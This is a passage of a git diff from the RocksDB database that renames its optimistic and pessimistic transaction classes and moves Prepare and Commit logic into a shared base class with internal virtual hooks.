utilities/transactions/optimistic_transaction_impl.cc \ + utilities/transactions/optimistic_transaction.cc \ utilities/transactions/transaction_base.cc \ utilities/transactions/pessimistic_transaction_db.cc \ utilities/transactions/transaction_db_mutex_impl.cc \ - utilities/transactions/transaction_impl.cc \ + utilities/transactions/pessimistic_transaction.cc \ utilities/transactions/transaction_lock_mgr.cc \ utilities/transactions/transaction_util.cc \ - utilities/transactions/write_prepared_transaction_impl.cc \ + utilities/transactions/write_prepared_txn.cc \ utilities/ttl/db_ttl_impl.cc \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 783c9d4ef1b..9e1623eb5c4 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -32,7 +32,7 @@ #include "util/random.h" #include "util/timer_queue.h" #include "utilities/transactions/optimistic_transaction_db_impl.h" -#include 
"utilities/transactions/optimistic_transaction_impl.h" +#include "utilities/transactions/optimistic_transaction.h" namespace { int kBlockBasedTableVersionFormat = 2; diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction.cc similarity index 83% rename from utilities/transactions/optimistic_transaction_impl.cc rename to utilities/transactions/optimistic_transaction.cc index 044dded2365..882fbec4a51 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction.cc @@ -5,11 +5,9 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/optimistic_transaction_impl.h" +#include "utilities/transactions/optimistic_transaction.h" -#include #include -#include #include "db/column_family.h" #include "db/db_impl.h" @@ -25,40 +23,40 @@ namespace rocksdb { struct WriteOptions; -OptimisticTransactionImpl::OptimisticTransactionImpl( +OptimisticTransaction::OptimisticTransaction( OptimisticTransactionDB* txn_db, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetBaseDB(), write_options), txn_db_(txn_db) { Initialize(txn_options); } -void OptimisticTransactionImpl::Initialize( +void OptimisticTransaction::Initialize( const OptimisticTransactionOptions& txn_options) { if (txn_options.set_snapshot) { SetSnapshot(); } } -void OptimisticTransactionImpl::Reinitialize( +void OptimisticTransaction::Reinitialize( OptimisticTransactionDB* txn_db, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options) { TransactionBaseImpl::Reinitialize(txn_db->GetBaseDB(), write_options); Initialize(txn_options); } -OptimisticTransactionImpl::~OptimisticTransactionImpl() { +OptimisticTransaction::~OptimisticTransaction() { } -void OptimisticTransactionImpl::Clear() { +void OptimisticTransaction::Clear() { TransactionBaseImpl::Clear(); } -Status OptimisticTransactionImpl::Prepare() { +Status OptimisticTransaction::Prepare() { return Status::InvalidArgument( "Two phase commit not supported for optimistic transactions."); } -Status OptimisticTransactionImpl::Commit() { +Status OptimisticTransaction::Commit() { // Set up callback which will call CheckTransactionForConflicts() to // check whether this transaction is safe to be committed. OptimisticTransactionCallback callback(this); @@ -75,7 +73,7 @@ Status OptimisticTransactionImpl::Commit() { return s; } -Status OptimisticTransactionImpl::Rollback() { +Status OptimisticTransaction::Rollback() { Clear(); return Status::OK(); } @@ -83,7 +81,7 @@ Status OptimisticTransactionImpl::Rollback() { // Record this key so that we can check it for conflicts at commit time. // // 'exclusive' is unused for OptimisticTransaction. -Status OptimisticTransactionImpl::TryLock(ColumnFamilyHandle* column_family, +Status OptimisticTransaction::TryLock(ColumnFamilyHandle* column_family, const Slice& key, bool read_only, bool exclusive, bool untracked) { if (untracked) { @@ -114,7 +112,7 @@ Status OptimisticTransactionImpl::TryLock(ColumnFamilyHandle* column_family, // // Should only be called on writer thread in order to avoid any race conditions // in detecting write conflicts. 
-Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { +Status OptimisticTransaction::CheckTransactionForConflicts(DB* db) { Status result; auto db_impl = static_cast_with_check(db); @@ -127,7 +125,7 @@ Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { true /* cache_only */); } -Status OptimisticTransactionImpl::SetName(const TransactionName& name) { +Status OptimisticTransaction::SetName(const TransactionName& /* unused */) { return Status::InvalidArgument("Optimistic transactions cannot be named."); } diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction.h similarity index 82% rename from utilities/transactions/optimistic_transaction_impl.h rename to utilities/transactions/optimistic_transaction.h index 6baec6962ec..b49bd6ab900 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction.h @@ -26,13 +26,13 @@ namespace rocksdb { -class OptimisticTransactionImpl : public TransactionBaseImpl { +class OptimisticTransaction : public TransactionBaseImpl { public: - OptimisticTransactionImpl(OptimisticTransactionDB* db, + OptimisticTransaction(OptimisticTransactionDB* db, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options); - virtual ~OptimisticTransactionImpl(); + virtual ~OptimisticTransaction(); void Reinitialize(OptimisticTransactionDB* txn_db, const WriteOptions& write_options, @@ -67,20 +67,20 @@ class OptimisticTransactionImpl : public TransactionBaseImpl { void Clear() override; - void UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) override { + void UnlockGetForUpdate(ColumnFamilyHandle* /* unused */, + const Slice& /* unused */) override { // Nothing to unlock. 
} // No copying allowed - OptimisticTransactionImpl(const OptimisticTransactionImpl&); - void operator=(const OptimisticTransactionImpl&); + OptimisticTransaction(const OptimisticTransaction&); + void operator=(const OptimisticTransaction&); }; // Used at commit time to trigger transaction validation class OptimisticTransactionCallback : public WriteCallback { public: - explicit OptimisticTransactionCallback(OptimisticTransactionImpl* txn) + explicit OptimisticTransactionCallback(OptimisticTransaction* txn) : txn_(txn) {} Status Callback(DB* db) override { @@ -90,7 +90,7 @@ class OptimisticTransactionCallback : public WriteCallback { bool AllowWriteBatching() override { return false; } private: - OptimisticTransactionImpl* txn_; + OptimisticTransaction* txn_; }; } // namespace rocksdb diff --git a/utilities/transactions/optimistic_transaction_db_impl.cc b/utilities/transactions/optimistic_transaction_db_impl.cc index 001ebefe1f3..d9db6fde07e 100644 --- a/utilities/transactions/optimistic_transaction_db_impl.cc +++ b/utilities/transactions/optimistic_transaction_db_impl.cc @@ -14,7 +14,7 @@ #include "rocksdb/db.h" #include "rocksdb/options.h" #include "rocksdb/utilities/optimistic_transaction_db.h" -#include "utilities/transactions/optimistic_transaction_impl.h" +#include "utilities/transactions/optimistic_transaction.h" namespace rocksdb { @@ -25,7 +25,7 @@ Transaction* OptimisticTransactionDBImpl::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new OptimisticTransactionImpl(this, write_options, txn_options); + return new OptimisticTransaction(this, write_options, txn_options); } } @@ -81,8 +81,8 @@ Status OptimisticTransactionDB::Open( void OptimisticTransactionDBImpl::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options) { - assert(dynamic_cast(txn) != nullptr); - auto txn_impl = reinterpret_cast(txn); + assert(dynamic_cast(txn) != nullptr); + auto txn_impl = reinterpret_cast(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/pessimistic_transaction.cc similarity index 82% rename from utilities/transactions/transaction_impl.cc rename to utilities/transactions/pessimistic_transaction.cc index a2219e1a381..092b7132c25 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/pessimistic_transaction.cc @@ -5,7 +5,7 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" #include #include @@ -29,13 +29,13 @@ namespace rocksdb { struct WriteOptions; -std::atomic PessimisticTxn::txn_id_counter_(1); +std::atomic PessimisticTransaction::txn_id_counter_(1); -TransactionID PessimisticTxn::GenTxnID() { +TransactionID PessimisticTransaction::GenTxnID() { return txn_id_counter_.fetch_add(1); } -PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, +PessimisticTransaction::PessimisticTransaction(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetRootDB(), write_options), @@ -53,7 +53,7 @@ PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, Initialize(txn_options); } -void PessimisticTxn::Initialize(const TransactionOptions& txn_options) { +void PessimisticTransaction::Initialize(const TransactionOptions& txn_options) { txn_id_ = GenTxnID(); txn_state_ = STARTED; @@ -84,7 +84,7 @@ 
void PessimisticTxn::Initialize(const TransactionOptions& txn_options) { } } -PessimisticTxn::~PessimisticTxn() { +PessimisticTransaction::~PessimisticTransaction() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); if (expiration_time_ > 0) { txn_db_impl_->RemoveExpirableTransaction(txn_id_); @@ -94,12 +94,12 @@ PessimisticTxn::~PessimisticTxn() { } } -void PessimisticTxn::Clear() { +void PessimisticTransaction::Clear() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); TransactionBaseImpl::Clear(); } -void PessimisticTxn::Reinitialize(TransactionDB* txn_db, +void PessimisticTransaction::Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) { if (!name_.empty() && txn_state_ != COMMITED) { @@ -109,7 +109,7 @@ void PessimisticTxn::Reinitialize(TransactionDB* txn_db, Initialize(txn_options); } -bool PessimisticTxn::IsExpired() const { +bool PessimisticTransaction::IsExpired() const { if (expiration_time_ > 0) { if (db_->GetEnv()->NowMicros() >= expiration_time_) { // Transaction is expired. @@ -120,12 +120,12 @@ bool PessimisticTxn::IsExpired() const { return false; } -WriteCommittedTxnImpl::WriteCommittedTxnImpl( +WriteCommittedTxn::WriteCommittedTxn( TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) - : PessimisticTxn(txn_db, write_options, txn_options){}; + : PessimisticTransaction(txn_db, write_options, txn_options){}; -Status WriteCommittedTxnImpl::CommitBatch(WriteBatch* batch) { +Status WriteCommittedTxn::CommitBatch(WriteBatch* batch) { TransactionKeyMap keys_to_unlock; Status s = LockBatch(batch, &keys_to_unlock); @@ -163,7 +163,7 @@ Status WriteCommittedTxnImpl::CommitBatch(WriteBatch* batch) { return s; } -Status WriteCommittedTxnImpl::Prepare() { +Status PessimisticTransaction::Prepare() { Status s; if (name_.empty()) { @@ -192,12 +192,7 @@ Status WriteCommittedTxnImpl::Prepare() { txn_state_.store(AWAITING_PREPARE); // transaction can't expire after preparation expiration_time_ = 0; - WriteOptions write_options = write_options_; - write_options.disableWAL = false; - WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_); - s = db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(), - /*callback*/ nullptr, &log_number_, /*log ref*/ 0, - /* disable_memtable*/ true); + s = PrepareInternal(); if (s.ok()) { assert(log_number_ != 0); dbimpl_->MarkLogAsContainingPrepSection(log_number_); @@ -218,9 +213,20 @@ Status WriteCommittedTxnImpl::Prepare() { return s; } -Status WriteCommittedTxnImpl::Commit() { +Status WriteCommittedTxn::PrepareInternal() { + WriteOptions write_options = write_options_; + write_options.disableWAL = false; + WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_); + Status s = + db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(), + /*callback*/ nullptr, &log_number_, /*log ref*/ 0, + /* disable_memtable*/ true); + return s; +} + +Status PessimisticTransaction::Commit() { Status s; - bool commit_single = false; + bool commit_without_prepare = false; bool commit_prepared = false; if (IsExpired()) { @@ -234,25 +240,28 @@ Status WriteCommittedTxnImpl::Commit() { // our locks stolen. In this case the only valid state is STARTED because // a state of PREPARED would have a cleared expiration_time_. 
TransactionState expected = STARTED; - commit_single = std::atomic_compare_exchange_strong(&txn_state_, &expected, - AWAITING_COMMIT); + commit_without_prepare = std::atomic_compare_exchange_strong( + &txn_state_, &expected, AWAITING_COMMIT); TEST_SYNC_POINT("TransactionTest::ExpirableTransactionDataRace:1"); } else if (txn_state_ == PREPARED) { // expiration and lock stealing is not a concern commit_prepared = true; } else if (txn_state_ == STARTED) { // expiration and lock stealing is not a concern - commit_single = true; + commit_without_prepare = true; + // TODO(myabandeh): what if the user mistakenly forgets prepare? We should + // add an option so that the user explictly express the intention of + // skipping the prepare phase. } - if (commit_single) { + if (commit_without_prepare) { assert(!commit_prepared); if (WriteBatchInternal::Count(GetCommitTimeWriteBatch()) > 0) { s = Status::InvalidArgument( "Commit-time batch contains values that will not be committed."); } else { txn_state_.store(AWAITING_COMMIT); - s = db_->Write(write_options_, GetWriteBatch()->GetWriteBatch()); + s = CommitWithoutPrepareInternal(); Clear(); if (s.ok()) { txn_state_.store(COMMITED); @@ -261,21 +270,8 @@ Status WriteCommittedTxnImpl::Commit() { } else if (commit_prepared) { txn_state_.store(AWAITING_COMMIT); - // We take the commit-time batch and append the Commit marker. - // The Memtable will ignore the Commit marker in non-recovery mode - WriteBatch* working_batch = GetCommitTimeWriteBatch(); - WriteBatchInternal::MarkCommit(working_batch, name_); - - // any operations appended to this working_batch will be ignored from WAL - working_batch->MarkWalTerminationPoint(); + s = CommitInternal(); - // insert prepared batch into Memtable only skipping WAL. - // Memtable will ignore BeginPrepare/EndPrepare markers - // in non recovery mode and simply insert the values - WriteBatchInternal::Append(working_batch, GetWriteBatch()->GetWriteBatch()); - - s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr, - log_number_); if (!s.ok()) { ROCKS_LOG_WARN(db_impl_->immutable_db_options().info_log, "Commit write failed"); @@ -304,7 +300,31 @@ Status WriteCommittedTxnImpl::Commit() { return s; } -Status WriteCommittedTxnImpl::Rollback() { +Status WriteCommittedTxn::CommitWithoutPrepareInternal() { + Status s = db_->Write(write_options_, GetWriteBatch()->GetWriteBatch()); + return s; +} + +Status WriteCommittedTxn::CommitInternal() { + // We take the commit-time batch and append the Commit marker. + // The Memtable will ignore the Commit marker in non-recovery mode + WriteBatch* working_batch = GetCommitTimeWriteBatch(); + WriteBatchInternal::MarkCommit(working_batch, name_); + + // any operations appended to this working_batch will be ignored from WAL + working_batch->MarkWalTerminationPoint(); + + // insert prepared batch into Memtable only skipping WAL. 
+ // Memtable will ignore BeginPrepare/EndPrepare markers + // in non recovery mode and simply insert the values + WriteBatchInternal::Append(working_batch, GetWriteBatch()->GetWriteBatch()); + + auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr, + log_number_); + return s; +} + +Status WriteCommittedTxn::Rollback() { Status s; if (txn_state_ == PREPARED) { WriteBatch rollback_marker; @@ -331,7 +351,7 @@ Status WriteCommittedTxnImpl::Rollback() { return s; } -Status PessimisticTxn::RollbackToSavePoint() { +Status PessimisticTransaction::RollbackToSavePoint() { if (txn_state_ != STARTED) { return Status::InvalidArgument("Transaction is beyond state for rollback."); } @@ -349,7 +369,7 @@ Status PessimisticTxn::RollbackToSavePoint() { // Lock all keys in this batch. // On success, caller should unlock keys_to_unlock -Status PessimisticTxn::LockBatch(WriteBatch* batch, +Status PessimisticTransaction::LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock) { class Handler : public WriteBatch::Handler { public: @@ -372,12 +392,12 @@ Status PessimisticTxn::LockBatch(WriteBatch* batch, } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /* unused */) override { RecordKey(column_family_id, key); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /* unused */) override { RecordKey(column_family_id, key); return Status::OK(); } @@ -427,7 +447,7 @@ Status PessimisticTxn::LockBatch(WriteBatch* batch, // If check_shapshot is true and this transaction has a snapshot set, // this key will only be locked if there have been no writes to this key since // the snapshot time. -Status PessimisticTxn::TryLock(ColumnFamilyHandle* column_family, +Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family, const Slice& key, bool read_only, bool exclusive, bool untracked) { uint32_t cfh_id = GetColumnFamilyID(column_family); @@ -515,7 +535,7 @@ Status PessimisticTxn::TryLock(ColumnFamilyHandle* column_family, // Return OK() if this key has not been modified more recently than the // transaction snapshot_. 
-Status PessimisticTxn::ValidateSnapshot(ColumnFamilyHandle* column_family, +Status PessimisticTransaction::ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, SequenceNumber prev_seqno, SequenceNumber* new_seqno) { @@ -539,19 +559,19 @@ Status PessimisticTxn::ValidateSnapshot(ColumnFamilyHandle* column_family, false /* cache_only */); } -bool PessimisticTxn::TryStealingLocks() { +bool PessimisticTransaction::TryStealingLocks() { assert(IsExpired()); TransactionState expected = STARTED; return std::atomic_compare_exchange_strong(&txn_state_, &expected, LOCKS_STOLEN); } -void PessimisticTxn::UnlockGetForUpdate(ColumnFamilyHandle* column_family, +void PessimisticTransaction::UnlockGetForUpdate(ColumnFamilyHandle* column_family, const Slice& key) { txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString()); } -Status PessimisticTxn::SetName(const TransactionName& name) { +Status PessimisticTransaction::SetName(const TransactionName& name) { Status s; if (txn_state_ == STARTED) { if (name_.length()) { diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/pessimistic_transaction.h similarity index 86% rename from utilities/transactions/transaction_impl.h rename to utilities/transactions/pessimistic_transaction.h index dce5c7b97e4..a0162fa279c 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/pessimistic_transaction.h @@ -31,24 +31,23 @@ namespace rocksdb { class PessimisticTransactionDB; -class PessimisticTxn; // A transaction under pessimistic concurrency control. This class implements // the locking API and interfaces with the lock manager as well as the // pessimistic transactional db. -class PessimisticTxn : public TransactionBaseImpl { +class PessimisticTransaction : public TransactionBaseImpl { public: - PessimisticTxn(TransactionDB* db, const WriteOptions& write_options, + PessimisticTransaction(TransactionDB* db, const WriteOptions& write_options, const TransactionOptions& txn_options); - virtual ~PessimisticTxn(); + virtual ~PessimisticTransaction(); void Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options); - Status Prepare() override = 0; + Status Prepare() override; - Status Commit() override = 0; + Status Commit() override; virtual Status CommitBatch(WriteBatch* batch) = 0; @@ -111,6 +110,12 @@ class PessimisticTxn : public TransactionBaseImpl { int64_t GetDeadlockDetectDepth() const { return deadlock_detect_depth_; } protected: + virtual Status PrepareInternal() = 0; + + virtual Status CommitWithoutPrepareInternal() = 0; + + virtual Status CommitInternal() = 0; + void Initialize(const TransactionOptions& txn_options); Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock); @@ -170,41 +175,43 @@ class PessimisticTxn : public TransactionBaseImpl { const Slice& key) override; // No copying allowed - PessimisticTxn(const PessimisticTxn&); - void operator=(const PessimisticTxn&); + PessimisticTransaction(const PessimisticTransaction&); + void operator=(const PessimisticTransaction&); }; -class WriteCommittedTxnImpl : public PessimisticTxn { +class WriteCommittedTxn : public PessimisticTransaction { public: - WriteCommittedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + WriteCommittedTxn(TransactionDB* db, const WriteOptions& write_options, const TransactionOptions& txn_options); - virtual ~WriteCommittedTxnImpl() {} - - Status Prepare() override; - - Status Commit() override; + virtual 
~WriteCommittedTxn() {} Status CommitBatch(WriteBatch* batch) override; Status Rollback() override; private: + Status PrepareInternal() override; + + Status CommitWithoutPrepareInternal() override; + + Status CommitInternal() override; + Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, SequenceNumber prev_seqno, SequenceNumber* new_seqno); // No copying allowed - WriteCommittedTxnImpl(const WriteCommittedTxnImpl&); - void operator=(const WriteCommittedTxnImpl&); + WriteCommittedTxn(const WriteCommittedTxn&); + void operator=(const WriteCommittedTxn&); }; // Used at commit time to check whether transaction is committing before its // expiration time. class TransactionCallback : public WriteCallback { public: - explicit TransactionCallback(PessimisticTxn* txn) : txn_(txn) {} + explicit TransactionCallback(PessimisticTransaction* txn) : txn_(txn) {} - Status Callback(DB* db) override { + Status Callback(DB* /* unused */) override { if (txn_->IsExpired()) { return Status::Expired(); } else { @@ -215,7 +222,7 @@ class TransactionCallback : public WriteCallback { bool AllowWriteBatching() override { return true; } private: - PessimisticTxn* txn_; + PessimisticTransaction* txn_; }; } // namespace rocksdb diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 052dc80f730..9787d76df65 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -17,7 +17,7 @@ #include "rocksdb/utilities/transaction_db.h" #include "util/cast_util.h" #include "utilities/transactions/transaction_db_mutex_impl.h" -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" namespace rocksdb { @@ -128,7 +128,7 @@ Transaction* WriteCommittedTxnDB::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new WriteCommittedTxnImpl(this, write_options, txn_options); + return new WriteCommittedTxn(this, write_options, txn_options); } } @@ -139,7 +139,7 @@ Transaction* WritePreparedTxnDB::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new WritePreparedTxnImpl(this, write_options, txn_options); + return new WritePreparedTxn(this, write_options, txn_options); } } @@ -301,18 +301,18 @@ Status PessimisticTransactionDB::DropColumnFamily( return s; } -Status PessimisticTransactionDB::TryLock(PessimisticTxn* txn, uint32_t cfh_id, +Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key, bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); } -void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, +void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys) { lock_mgr_.UnLock(txn, keys, GetEnv()); } -void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, uint32_t cfh_id, +void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } @@ -409,7 +409,7 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not 
cause a deadlock. @@ -423,7 +423,7 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, } void PessimisticTransactionDB::InsertExpirableTransaction(TransactionID tx_id, - PessimisticTxn* tx) { + PessimisticTransaction* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); @@ -442,14 +442,14 @@ bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks( if (tx_it == expirable_transactions_map_.end()) { return true; } - PessimisticTxn& tx = *(tx_it->second); + PessimisticTransaction& tx = *(tx_it->second); return tx.TryStealingLocks(); } void PessimisticTransactionDB::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index d9cf7d55867..6ff1d015a80 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -15,9 +15,9 @@ #include "rocksdb/db.h" #include "rocksdb/options.h" #include "rocksdb/utilities/transaction_db.h" -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" #include "utilities/transactions/transaction_lock_mgr.h" -#include "utilities/transactions/write_prepared_transaction_impl.h" +#include "utilities/transactions/write_prepared_txn.h" namespace rocksdb { @@ -64,11 +64,11 @@ class PessimisticTransactionDB : public TransactionDB { using StackableDB::DropColumnFamily; virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override; - Status TryLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key, + Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key, bool exclusive); - void UnLock(PessimisticTxn* txn, const TransactionKeyMap* keys); - void UnLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key); + void UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys); + void UnLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key); void AddColumnFamily(const ColumnFamilyHandle* handle); @@ -79,7 +79,7 @@ class PessimisticTransactionDB : public TransactionDB { return txn_db_options_; } - void InsertExpirableTransaction(TransactionID tx_id, PessimisticTxn* tx); + void InsertExpirableTransaction(TransactionID tx_id, PessimisticTransaction* tx); void RemoveExpirableTransaction(TransactionID tx_id); // If transaction is no longer available, locks can be stolen @@ -116,7 +116,7 @@ class PessimisticTransactionDB : public TransactionDB { // that has started a commit. Only transactions with an expiration time // should be in this map. 
std::mutex map_mutex_; - std::unordered_map + std::unordered_map expirable_transactions_map_; // map from name to two phase transaction instance diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 95612cd3974..d93d5bcde77 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -227,7 +227,7 @@ bool TransactionLockMgr::IsLockExpired(TransactionID txn_id, return expired; } -Status TransactionLockMgr::TryLock(PessimisticTxn* txn, +Status TransactionLockMgr::TryLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive) { @@ -256,7 +256,7 @@ Status TransactionLockMgr::TryLock(PessimisticTxn* txn, // Helper function for TryLock(). Status TransactionLockMgr::AcquireWithTimeout( - PessimisticTxn* txn, LockMap* lock_map, LockMapStripe* stripe, + PessimisticTransaction* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info) { Status result; @@ -357,13 +357,13 @@ Status TransactionLockMgr::AcquireWithTimeout( } void TransactionLockMgr::DecrementWaiters( - const PessimisticTxn* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, const autovector& wait_ids) { std::lock_guard lock(wait_txn_map_mutex_); DecrementWaitersImpl(txn, wait_ids); } void TransactionLockMgr::DecrementWaitersImpl( - const PessimisticTxn* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, const autovector& wait_ids) { auto id = txn->GetID(); assert(wait_txn_map_.Contains(id)); wait_txn_map_.Delete(id); @@ -377,7 +377,7 @@ void TransactionLockMgr::DecrementWaitersImpl( } bool TransactionLockMgr::IncrementWaiters( - const PessimisticTxn* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, const autovector& wait_ids) { auto id = txn->GetID(); std::vector queue(txn->GetDeadlockDetectDepth()); std::lock_guard lock(wait_txn_map_mutex_); @@ -501,7 +501,7 @@ Status TransactionLockMgr::AcquireLocked(LockMap* lock_map, return result; } -void TransactionLockMgr::UnLockKey(const PessimisticTxn* txn, +void TransactionLockMgr::UnLockKey(const PessimisticTransaction* txn, const std::string& key, LockMapStripe* stripe, LockMap* lock_map, Env* env) { @@ -537,7 +537,7 @@ void TransactionLockMgr::UnLockKey(const PessimisticTxn* txn, } } -void TransactionLockMgr::UnLock(PessimisticTxn* txn, uint32_t column_family_id, +void TransactionLockMgr::UnLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env) { std::shared_ptr lock_map_ptr = GetLockMap(column_family_id); LockMap* lock_map = lock_map_ptr.get(); @@ -559,7 +559,7 @@ void TransactionLockMgr::UnLock(PessimisticTxn* txn, uint32_t column_family_id, stripe->stripe_cv->NotifyAll(); } -void TransactionLockMgr::UnLock(const PessimisticTxn* txn, +void TransactionLockMgr::UnLock(const PessimisticTransaction* txn, const TransactionKeyMap* key_map, Env* env) { for (auto& key_map_iter : *key_map) { uint32_t column_family_id = key_map_iter.first; diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 86a65783fdf..6e542071c15 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -17,7 +17,7 @@ #include "util/autovector.h" #include "util/hash_map.h" #include "util/thread_local.h" -#include "utilities/transactions/transaction_impl.h" 
+#include "utilities/transactions/pessimistic_transaction.h" namespace rocksdb { @@ -47,14 +47,14 @@ class TransactionLockMgr { // Attempt to lock key. If OK status is returned, the caller is responsible // for calling UnLock() on this key. - Status TryLock(PessimisticTxn* txn, uint32_t column_family_id, + Status TryLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive); // Unlock a key locked by TryLock(). txn must be the same Transaction that // locked this key. - void UnLock(const PessimisticTxn* txn, const TransactionKeyMap* keys, + void UnLock(const PessimisticTransaction* txn, const TransactionKeyMap* keys, Env* env); - void UnLock(PessimisticTxn* txn, uint32_t column_family_id, + void UnLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env); using LockStatusData = std::unordered_multimap; @@ -102,7 +102,7 @@ class TransactionLockMgr { std::shared_ptr GetLockMap(uint32_t column_family_id); - Status AcquireWithTimeout(PessimisticTxn* txn, LockMap* lock_map, + Status AcquireWithTimeout(PessimisticTransaction* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info); @@ -112,14 +112,14 @@ class TransactionLockMgr { const LockInfo& lock_info, uint64_t* wait_time, autovector* txn_ids); - void UnLockKey(const PessimisticTxn* txn, const std::string& key, + void UnLockKey(const PessimisticTransaction* txn, const std::string& key, 